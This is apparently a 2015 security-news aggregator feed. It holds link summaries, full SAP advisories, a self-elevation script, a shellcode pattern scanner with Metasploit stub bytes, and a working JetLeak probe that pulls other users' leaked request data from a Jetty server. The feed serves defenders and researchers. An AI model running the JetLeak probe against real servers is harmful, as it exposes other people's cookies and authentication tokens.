Channel: BOT24

Overview of handheld malware for 2014

Russian anti-virus company Doctor Web presents its 2014 overview of malware for handheld devices. The last year proved to be rather turbulent and rich in terms of information security events. We witnessed the emergence of a variety of new malicious applications for Android. In particular, the number of banking Trojans whose numerous modifications attacked devices in many countries increased significantly. Furthermore, 2014 saw the discovery of the first ransomware programs as well as cryptocurrency miners for Android. On top of this, handhelds were endangered by spying Trojans and multi-purpose programs executing commands from remote servers as well as by malicious code in Android firmware. Neither did virus makers neglect iOS; they presented several malicious applications for this platform.

more here.........http://news.drweb.com/show/?i=9222&lng=en&c=5

Automating DFIR (Digital Forensic Incident Response) - How to series on programming libtsk with python Part 5

This is part 5 of a planned 24 part series. If you haven't read the prior parts I would highly recommend you do to understand how we got to this point!

Part 1 - Accessing an image and printing the partition table
Part 2 - Extracting a file from an image
Part 3 - Extracting a file from a live system
Part 4 - Turning a python script into a windows executable

In this post, before continuing on to accessing an E01 image, which is a bit more complicated, let's make our lives a little bit easier. It's always a pain when you forget to open an administrative command prompt to run your script, and in future posts when we get to GUIs it's easy to forget to right click and run as administrator/sudo your script. So instead let's have our code do it for us. Now, I can't take credit for this code; like most good programmers I turn to Google for answers, which most frequently leads to stackoverflow.com. On stackoverflow I found a series of threads which offered solutions to the problem of elevating a python script, and in testing I found the following thread to offer the best solution: http://stackoverflow.com/questions/19672352/how-to-run-python-script-with-elevated-privilage-on-windows

So let's look at what changes we need to make our DFIR Wizard program to do this.

more here.......http://hackingexposedcomputerforensicsblog.blogspot.in/2015/02/automating-dfir-how-to-series-on_24.html
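
An added example of the self-elevation idea, not the DFIR Wizard code from the post itself (that is at the link above). The Windows branch uses the same ctypes ShellExecuteW "runas" technique as the Stack Overflow answer the post points to; the POSIX branch (re-running the script under sudo), the helper names and the argument quoting are this example's own assumptions. The command builder is kept separate from the relaunch so the decision logic can be tested without triggering a UAC or sudo prompt.

```python
import ctypes
import os
import subprocess
import sys


def is_admin():
    """True if this process already has administrative rights."""
    if os.name == "nt":
        try:
            return bool(ctypes.windll.shell32.IsUserAnAdmin())
        except (AttributeError, OSError):
            return False
    return os.geteuid() == 0


def quote_windows_arg(arg):
    """Quote one argument for the lpParameters string given to ShellExecuteW."""
    if arg and not any(c in arg for c in ' \t"'):
        return arg
    return '"' + arg.replace('"', '\\"') + '"'


def elevation_command(argv, platform):
    """Build the relaunch command for platform 'nt' or 'posix'.

    Windows: ('runas', <python.exe>, '<quoted script and args>') for
    ShellExecuteW; POSIX: an argv list for sudo.  Separated from
    relaunch_elevated() so it can be tested without an elevation prompt.
    """
    if platform == "nt":
        params = " ".join(quote_windows_arg(a) for a in argv)
        return ("runas", sys.executable, params)
    return ["sudo", "--", sys.executable] + list(argv)


def relaunch_elevated(argv=None):
    """Start an elevated copy of this script.

    Returns True if the elevated copy was launched (the caller should
    then exit) and False if the user refused or the launch failed.
    """
    argv = list(sys.argv) if argv is None else list(argv)
    if os.name == "nt":
        verb, exe, params = elevation_command(argv, "nt")
        # ShellExecuteW returns an HINSTANCE-style value: > 32 means success.
        rc = ctypes.windll.shell32.ShellExecuteW(None, verb, exe, params, None, 1)
        return rc > 32
    # On POSIX sudo runs the elevated copy synchronously; propagate its result.
    return subprocess.call(elevation_command(argv, "posix")) == 0


def main():
    if not is_admin():
        print("Not elevated; relaunching as administrator ...")
        sys.exit(0 if relaunch_elevated() else "Elevation failed or was refused.")
    # Privileged work goes here (e.g. opening \\.\PhysicalDrive0 with pytsk3).
    print("Running with administrative rights.")


if __name__ == "__main__":
    main()
```

Two practical caveats: a script relaunched through "runas" gets a new console window, so anything it prints disappears when it exits unless you pause or log to a file; and the elevated copy does not inherit the parent's current directory on every Windows version, so pass image paths as absolute paths.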

TaiG Jailbreak Tool for iOS 8.2 beta 1 & 2 on Windows just released

The TaiG Jailbreak Tool for iOS 8.2 beta can be found here......http://taig.com/en/

Security Advisory – WP-Slimstat 3.9.5 and lower

WP-Slimstat’s users should update as soon as possible! During a routine audit for our WAF, we discovered a security bug that an attacker could, by breaking the plugin’s weak “secret” key, use to perform a SQL Injection attack against the target website.

more here..........http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

Gemalto presents the findings of its investigations into the alleged hacking of SIM card encryption keys by Britain's Government Communications Headquarters (GCHQ) and the U.S. National Security Agency (NSA)

Following the release of a report by a news website on February 19, 2015, Gemalto (Euronext NL0000400653 GTO), has conducted a thorough investigation, based in particular on two elements: the purported NSA and GCHQ documents which were made public by this website, and our internal monitoring tools and their past records of attempts of attacks.

more here..........http://www.gemalto.com/press/Pages/Gemalto-presents-the-findings-of-its-investigations-into-the-alleged-hacking-of-SIM-card-encryption-keys.aspx

Clean.navy, DOD cleaning contractor’s website dirty, serves malware

On February 23 Cyphort Labs discovered that the website clean.navy is serving malware. Clean.navy is also used in a malvertising campaign via the ad network adgoto.com. We have reported previously on a rising trend in drive-by infection through advertisement networks. The website belongs to a US Department of Defense contractor, Werth Sanitary Supply Co., Inc., of 916 Fesler Street, El Cajon, California. Clean.navy loads the Angler Exploit Kit with an exploit for CVE-2014-6332 (Windows OLE Automation Array Remote Code Execution Vulnerability).

more here........http://www.cyphort.com/dod-contractors-website-clean-navy-serving-drive-exploits/

Copy.com Used to Distribute Crypto Ransomware

Thanks to Marco for sending us a sample of yet another piece of crypto-ransom malware. The file was retrieved after visiting a compromised site (www.my-sda24.com). Interestingly, the malware itself was stored on copy.com.

Copy.com is a cloud based file sharing service targeting corporate users.

more here.........https://isc.sans.edu/diary/Copy.com+Used+to+Distribute+Crypto+Ransomware/19371

Bypassing Windows Lock Screen via Flash Screensaver

We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running.

The method allows an attacker to gain unauthorized access to a user’s Windows session if he has physical access to a locked machine.

more here.........http://securitycafe.ro/2015/02/23/bypassing-windows-lock-screen-via-flash-screensaver/

Windows/Phone 8.1 Debugging: Getting a Crash Dump File From a Device

Imagine you’re testing out a Windows/Phone app on a device where it’s crashing but you can’t easily debug it. Perhaps it’s not your device.

Now, on the one hand, the Store can help with this ( as per this post ) but that’s not much help if the app isn’t in Store.

Fortunately, both Windows and Phone help you with this. I think the Windows behaviour has been there for a long time and I think the Phone behaviour is specific to V8.1 but I haven’t checked that in any great detail.

Here’s how to get it going.........http://mtaulty.com/CommunityServer/blogs/mike_taultys_blog/archive/2015/02/19/windows-phone-8-1-debugging-getting-a-crash-dump-file-from-a-device.aspx

In-Memory ShellCode Detection Using a Patterns-Based Methodology

During an analysis, it can be really useful to know some common instructions with which malware, and more specifically shellcodes, achieve their goals. As we can imagine, these sets of common instructions could be used first to locate and later to analyze and/or to identify general threats: embedded or injected code.

In this article, we’ll focus on the identification and analysis of Metasploit and some custom shellcodes on the basis of parameters and information coming from brief research and personal experience.

more here..........http://blog.norsecorp.com/2015/02/24/in-memory-shellcode-detection-using-a-patterns-based-methodology/
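
An added example, not code from the Norse article: a small patterns-based scanner of the kind the article describes, written to be run over a memory dump or a carved buffer. The signatures are x86 (32-bit) opcode sequences that Windows shellcode commonly uses (PEB lookup through fs:[0x30], the PEB.Ldr module-list walk, the ROR-13 API hashing loop, and two GetPC idioms), and hits are clustered because several different signatures inside a few hundred bytes are much stronger evidence than one isolated match. The sample buffer is constructed here from the well-known opening bytes of the Metasploit block_api stub padded with NOPs; it is not a live payload, and the signature names and the clustering window are this example's own choices.

```python
import re

# x86 (32-bit) byte patterns that Windows shellcode, including the
# Metasploit block_api stub, relies on. Each entry: (name, compiled regex).
SIGNATURES = [
    # mov r32, fs:[r32+0x30] -> PEB pointer from the TEB (64 8B /r, mod=01, disp8=0x30, no SIB)
    ("peb_fs30_disp8", re.compile(rb"\x64\x8b[\x40-\x7f]\x30")),
    # mov eax, fs:[0x30] (64 A1) or mov r32, fs:[0x30] (64 8B /r, mod=00 rm=101)
    ("peb_fs30_abs", re.compile(
        rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00")),
    # mov edx,[edx+0xC] ; mov edx,[edx+0x14] -> PEB.Ldr -> InMemoryOrderModuleList
    ("ldr_module_list_walk", re.compile(rb"\x8b\x52\x0c\x8b\x52\x14")),
    # ror edi,13 ; add edi,eax -> the API-name hashing loop
    ("ror13_api_hash", re.compile(rb"\xc1\xcf\x0d\x01\xc7")),
    # call $+5 ; pop r32 -> GetPC
    ("getpc_call_pop", re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]")),
    # fnstenv [esp-0xC] -> FPU-based GetPC (used by shikata_ga_nai)
    ("getpc_fnstenv", re.compile(rb"\xd9\x74\x24\xf4")),
]


def scan(buf):
    """Return [(signature_name, offset), ...] sorted by offset."""
    hits = [(name, m.start()) for name, rx in SIGNATURES for m in rx.finditer(buf)]
    return sorted(hits, key=lambda h: (h[1], h[0]))


def cluster_hits(hits, window=256):
    """Group hits that lie within `window` bytes of a cluster's first hit.

    Shellcode stubs are compact, so several *different* signatures inside
    one window are far stronger evidence than a lone match, which can be a
    false positive in ordinary code or data.
    """
    clusters = []
    for name, off in hits:
        if clusters and off - clusters[-1]["start"] <= window:
            clusters[-1]["end"] = off
            clusters[-1]["names"].add(name)
        else:
            clusters.append({"start": off, "end": off, "names": {name}})
    return clusters


def suspicious_regions(buf, window=256, min_distinct=2):
    """Clusters that contain at least `min_distinct` different signatures."""
    return [c for c in cluster_hits(scan(buf), window) if len(c["names"]) >= min_distinct]


# Constructed sample: the opening 44 bytes of the well-known Metasploit
# block_api stub (cld; call; pushad; ... PEB walk ... ror13 hash loop), then a
# separate call/pop GetPC far away, all padded with NOPs. Not a live payload.
METASPLOIT_STUB_HEAD = bytes.fromhex(
    "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a26"
    "31ffac3c617c022c20c1cf0d01c7e2f2"
)
SAMPLE = (b"\x90" * 64 + METASPLOIT_STUB_HEAD + b"\x90" * 700
          + bytes.fromhex("e8000000005b") + b"\x90" * 64)


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("%-22s @ 0x%04x" % hit)
    for region in suspicious_regions(SAMPLE):
        print("suspicious region 0x%04x-0x%04x: %s"
              % (region["start"], region["end"], ", ".join(sorted(region["names"]))))
```

On the sample the three PEB/hash signatures land within 26 bytes of each other and are reported as one region, while the lone call/pop GetPC 700 bytes later stays below the two-signature threshold. Encoded payloads (shikata_ga_nai and friends) only expose the decoder stub, so in practice the GetPC signatures are what fire first and the region should then be emulated or dumped after decoding.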

JetLeak Vulnerability: Remote Leakage Of Shared Buffers In Jetty Web Server [CVE-2015-2080] - Used in products such as Apache ActiveMQ, Alfresco, Apache Geronimo, Apache Maven, Apache Spark, Google App Engine, Eclipse, FUSE, Twitter's Streaming API and Zimbra. The server is also embedded in open source projects such as Lift, Eucalyptus, Red5, Hadoop and I2P

GDS discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests submitted to the server by other users. I know that sentence is a mouthful, so take a brief moment to digest it, or simply keep reading to understand what that means. Simply put, if you’re running a vulnerable version of the Jetty web server, this can lead to the compromise of sensitive data, including data passed within headers (e.g. cookies, authentication tokens, Anti-CSRF tokens, etc.), as well as data passed in the POST body (e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc.). (GDS also observed this data leakage vulnerability with responses as well, but for brevity this blog post will concentrate on requests)

more here..............http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html


Additional reference links on vuln below and testing script included in above article:
 http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
 https://github.com/eclipse/jetty.project/blob/master/advisories/2015-02-24-httpparser-error-buffer-bleed.md
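
An added example, not the GDS test script linked from the article: it builds a request with an illegal byte in a header, parses the server's status line, and flags a response whose 400 reason phrase carries the parser's "Illegal character" error together with echoed buffer contents, which is the signal the advisory describes. Which header carries the bad byte, the '<<<...>>>' markers assumed around the buffer dump, and the layout of the constructed sample responses are this example's own assumptions; no real server was contacted to produce them.

```python
import re
import socket

BAD_BYTE = b"\x00"  # any byte the HTTP parser rejects will take the error path


def build_probe(host, path="/"):
    """Request whose Referer header carries an illegal byte (header choice is arbitrary)."""
    return (b"GET " + path.encode() + b" HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n"
            b"Referer: " + BAD_BYTE + b"\r\n"
            b"Connection: close\r\n\r\n")


def parse_status_line(raw):
    """Return (status_code, reason_phrase) from the first line of a response."""
    first = raw.split(b"\r\n", 1)[0]
    m = re.match(rb"HTTP/\d\.\d (\d{3}) ?(.*)", first)
    if not m:
        return None, b""
    return int(m.group(1)), m.group(2)


def analyse(raw):
    """Classify a raw response to the probe.

    A patched server answers 400 with a plain reason phrase. A vulnerable
    one answers 400 with the parser's 'Illegal character ...' message and
    a debug dump of the shared buffer, which carries bytes left over from
    other users' requests; the dump is what this function extracts.
    """
    code, reason = parse_status_line(raw)
    result = {"status": code, "vulnerable": False, "leaked": b""}
    if code == 400 and b"Illegal character" in reason:
        result["vulnerable"] = True
        # The '<<<...>>>' region is assumed to be the buffer dump; fall back
        # to the whole reason phrase when no markers are present.
        m = re.search(rb"<<<(.*?)>>>", reason)
        result["leaked"] = m.group(1) if m else reason
    return result


def probe(host, port=8080, timeout=5.0):
    """Send the probe to a live server and analyse its answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return analyse(b"".join(chunks))


# Constructed sample responses (no real server was contacted).
SAMPLE_VULNERABLE = (
    b"HTTP/1.1 400 Illegal character 0x0 in state HEADER_VALUE in "
    b"'Referer: \\x00<<<\\r\\nCookie: JSESSIONID=1a2b3c4d5e6f"
    b"\\r\\nAuthorization: Bearer deadbeef>>>\\r\\n'\r\n"
    b"Content-Length: 0\r\nConnection: close\r\n\r\n"
)
SAMPLE_PATCHED = b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
        print(probe(sys.argv[1], port))
    else:
        print(analyse(SAMPLE_VULNERABLE))
        print(analyse(SAMPLE_PATCHED))
```

Run it against your own Jetty instances only: every probe that succeeds returns a slice of someone else's request, so on a shared server a positive result is itself a disclosure. A plain "400 Bad Request" with no parser detail is what the fixed versions return.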

Scanning Internet-exposed Modbus devices for fun & fun

A scan I have run against the whole IPv4 address space, looking for Internet-exposed Modbus services.

more here.......http://pierre.droids-corp.org/blog/html/2015/02/24/scanning_internet_exposed_modbus_devices_for_fun___fun.html

x86obf source code

After releasing the x86obf tool for free I received quite a few requests
for the source code. It was planned for the future, but I've decided to
release it sooner.

The source code has been slightly stripped. Junk code generators are
removed (they emit NOP only), data encryption is removed and so is
bytecode encryption/obfuscation.

more here..........http://chaplja.blogspot.in/2015/02/x86obf-source-code.html

[Onapsis Security Advisory 2015-001] Multiple Reflected Cross Site Scripting Vulnerabilities in SAP HANA Web-based Development Workbench

Onapsis Security Advisory ONAPSIS-2015-001: Multiple Reflected Cross Site
Scripting Vulnerabilities in SAP HANA Web-based Development Workbench


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to attack other users of the system.

Risk Level: Medium


2. Advisory Information
=========================
- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-001

- - Onapsis SVS ID: ONAPSIS-00137 and ONAPSIS-00138

- - CVE: CVE-2015-2072

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 4.3 (AV:N/AC:M/AU:N/C:N/I:P/A:N)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
  -HANA - Release 73 (1.00.73.00.389160)
  - HANA Developer Edition - Release 80 (1.00.80.00.391861)
  (Check SAP Note 2069676 for detailed information on affected releases)

- - Vulnerability Class: CWE-79: Improper Neutralization of Input During
Web Page Generation (Reflected Cross-Site Scripting)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/multiple-reflected-cross-site-scripting-vulnerabilities-in-sap-hana-webbased-development-workbench


4. Affected Components Description
==================================

SAP HANA is a platform for real-time business. It combines database,
data processing, and application platform capabilities in-memory. The
platform provides libraries for predictive, planning, text processing,
spatial, and business analytics.


5. Vulnerability Details
========================

SAP HANA contains a reflected Cross Site Scripting vulnerability
(XSS) on the pages
/sap/hana/ide/core/plugins/editor/templates/trace/hanaTraceDetailService.xsjs
and /sap/hana/xs/ide/editor/templates/trace/hanaTraceDetailService.xsjs.

A reflected cross-site scripting attack can be used to non-permanently
deface or modify displayed content from a Web site. Reflected cross-site
scripting can be used to steal another user's authentication
information, such as data relating to their current session. An attacker
who gains access to this data may use it to impersonate the user and
access all information with the same rights as the target user. If an
administrator is impersonated, the security of the application may be
fully compromised.


6. Solution
===========

SAP has released SAP Note 2069676 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2069676

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-02-25: Onapsis provides vulnerability information to SAP AG.
2014-02-26: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


About Onapsis Research Labs
===========================

Onapsis Research Labs provides the industry analysis of key security
issues that impact business-critical systems and applications.
Delivering frequent and timely security and compliance advisories with
associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.


About Onapsis, Inc.
===================

Onapsis gives organizations the adaptive advantage to succeed in
securing business-critical applications by combining technology,
research and analytics. Onapsis enables every security and compliance
team an adaptive approach to focus on the factors that matter most to
their business-critical applications that house vital data and run
business processes including SAP Business Suite, SAP HANA and SAP Mobile
deployments.

Onapsis provides technology solutions including Onapsis X1, the de-facto
SAP security auditing tool, and Onapsis Security Platform which delivers
enterprise vulnerability, compliance, detection and response
capabilities with analytics.

The Onapsis Research Labs provide subject matter expertise that combines
in-depth knowledge and experience to deliver technical and
business-context with sound security judgment. This enables
organizations to efficiently uncover security and compliance gaps and
prioritize the resolution within applications running on SAP platforms.

Onapsis delivers tangible business results including decreased business
risk, highlighted compliance gaps, lower operational security costs and
demonstrable value on investment.

[Onapsis Security Advisory 2015-002] SAP Business Objects Unauthorized File Repository Server Read via CORBA

Onapsis Security Advisory ONAPSIS-2015-002: SAP Business Objects
Unauthorized File Repository Server Read via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to retrieve sensitive business data stored on the remote system.

Risk Level: High


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-002

- - Onapsis SVS ID: ONAPSIS-00111

- - CVE: CVE-2015-2073

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
  - BusinessObjects Edge 4.0
  (Check SAP Note 2018682 for detailed information on affected releases)

- - Vulnerability Class: External Control of File Name or Path (CWE-73)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-read-via-corba

4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

The BusinessObjects File Repository Server (FRS) CORBA listener allows a
user to read any file stored in the FRS without authentication. The only
requirement is that the user know the name of the file in the FRS. For
example, "frs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rpt". With
knowledge of this filename, the user can read the file remotely without
authentication.

Note that, using CORBA, it is also possible to test if a directory or file exists
on the file system. Therefore, although unlikely, an attacker could
guess directories and then filenames to brute-force file locations. This
would be considerably easier with a predictable file naming convention.


6. Solution
===========

SAP has released SAP Note 2018682 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2018682
Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.



7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.

FLASH, CVE-2015-0313 PoC

Use-after-free vulnerability in Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2015, a different vulnerability than CVE-2015-0315, CVE-2015-0320, and CVE-2015-0322.

more here...........http://blog.hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/

[Onapsis Security Advisory 2015-003] SAP Business Objects Unauthorized File Repository Server Write via CORBA

Onapsis Security Advisory ONAPSIS-2015-003: SAP Business Objects
Unauthorized File Repository Server Write via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to overwrite sensitive business data stored on the remote system.

Risk Level: High


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-003

- - Onapsis SVS ID: ONAPSIS-00109

- - CVE: CVE-2015-2074

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
  - BusinessObjects Edge 4.0
  (Check SAP Note 2018681 for detailed information on affected releases)

- - Vulnerability Class: External Control of File Name or Path (CWE-73)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-file-repository-server-write-via-corba


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

The BusinessObjects File Repository Server (FRS) CORBA listener allows
the writing of any file stored in the FRS without authentication. If the
attacker wishes to overwrite a file, the only requirement is that the
user know the name of the file in the FRS. For example,
"frs://Input/a_103/019/000/4967/1b14796c5b0d5f2c.rpt". With
knowledge of this filename, the user can write the file remotely without
authentication.

Note, using CORBA it is also possible to test if a directory or file
exists on the file system. Therefore, although unlikely, an attacker
could guess directories and then filenames brute-forcing files to
overwrite. This would be considerably easier with a predictable file
naming convention.


6. Solution
===========

SAP has released SAP Note 2018681 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2018681

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


[Onapsis Security Advisory 2015-005] SAP Business Objects Unauthorized Audit Information Access via CORBA

Onapsis Security Advisory ONAPSIS-2015-005: SAP Business Objects
Unauthorized Audit Information Access via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to read auditing information thus accessing sensitive business data.
Access to this functionality should be restricted.

Risk Level: Medium


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-005

- - Onapsis SVS ID: ONAPSIS-00110

- - CVE: CVE-2015-2076

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 5.0 (AV:N/AC:L/AU:N/C:P/I:N/A:N)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
    - BusinessObjects Edge 4.0
    (Check SAP Note 2011395 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-audit-information-access-via-corba


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

It is possible for an unauthenticated user to retrieve any audit events
from a remote BusinessObjects service. This can disclose sensitive
information including report names, universe queries, logins, etc.
Auditing details are listed in the Auditing tab of the CMS. All services
which expose an Auditing service are vulnerable. In the default setting
this includes all BusinessObjects services except the CMS.


6. Solution
===========

SAP has released SAP Note 2011395 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2011395

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-02-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


[Onapsis Security Advisory 2015-004] SAP Business Objects Unauthorized Audit Information Delete via CORBA

Onapsis Security Advisory ONAPSIS-2015-004: SAP Business Objects
Unauthorized Audit Information Delete via CORBA


1. Impact on Business
=====================

By exploiting this vulnerability a remote unauthenticated attacker would be
able to delete auditing information of the remote system.

This way, the attacker could perform malicious activities without being
detected.

Risk Level: High


2. Advisory Information
=======================

- - Public Release Date: 2015-02-25

- - Subscriber Notification Date: 2015-02-25

- - Last Revised: 2015-02-25

- - Security Advisory ID: ONAPSIS-2015-004

- - Onapsis SVS ID: ONAPSIS-00112

- - CVE: CVE-2015-2075

- - Researcher: Will Vandevanter

- - Initial Base CVSS v2: 6.4 (AV:N/AC:L/AU:N/C:N/I:P/A:P)


3. Vulnerability Information
============================

- - Vendor: SAP

- - Affected Components:
    - BusinessObjects Edge 4.0
    (Check SAP Note 2011396 for detailed information on affected releases)

- - Vulnerability Class: Improper Authorization (CWE-285)

- - Remotely Exploitable: Yes

- - Locally Exploitable: No

- - Authentication Required: No

- - Original Advisory:
http://www.onapsis.com/research/security-advisories/sap-business-objects-unauthorized-audit-information-delete-via-corba


4. Affected Components Description
==================================

Business Objects is part of the Business Intelligence platform from SAP.
It has components that provide performance management, planning,
reporting, query and analysis and enterprise information management.

Every Business Objects installation provides a web service to interact
with different platform services.


5. Vulnerability Details
========================

It is possible for an unauthenticated user to remove audit events from a
remote BusinessObjects service using CORBA. Specifically, the attacker
can tell the remote service (i.e. the auditee) to clear an event from
its queue. After the event is removed from the auditee queue, the
auditor will never have knowledge of the event and, hence, it will not
be written to the Audit database. An attacker can use this to hide their
actions. By default, the auditor polls all auditees every 5 minutes to
ask for events in their queue.

Note, this vulnerability does not allow an attacker to remove events
already written to the database. It only allows events waiting in the
auditee queue to be removed. The clearData CORBA operation is used to
remove the event; authentication is not required.


6. Solution
===========

SAP has released SAP Note 2011396 which provides patched versions of the
affected components.

The patches can be downloaded from
https://service.sap.com/sap/support/notes/2011396

Onapsis strongly recommends SAP customers to download the related
security fixes and apply them to the affected components in order to
reduce business risks.


7. Report Timeline
==================

2014-01-16: Onapsis provides vulnerability information to SAP AG.
2014-02-17: SAP confirms having the information of vulnerability.
2014-10-14: SAP releases security patches.
2015-02-25: Onapsis releases security advisory.


Revisiting Defcon CTF Shitsco Use-After-Free Vulnerability - Remote Code Execution

Defcon Quals 2014 Shitsco was an interesting challenge. There were two vulnerabilities in the binary: a strcmp information leak and a use-after-free. The challenge could be solved with either of these, but getting an RCE seemed hard. Details of the vulnerability can be found here: Defcon Quals 2014 - Gynophage - shitsco - [Use-After-Free Vulnerability]. To recap

more here........http://v0ids3curity.blogspot.in/2015/02/revisiting-defcon-ctf-shitsco-use-after.html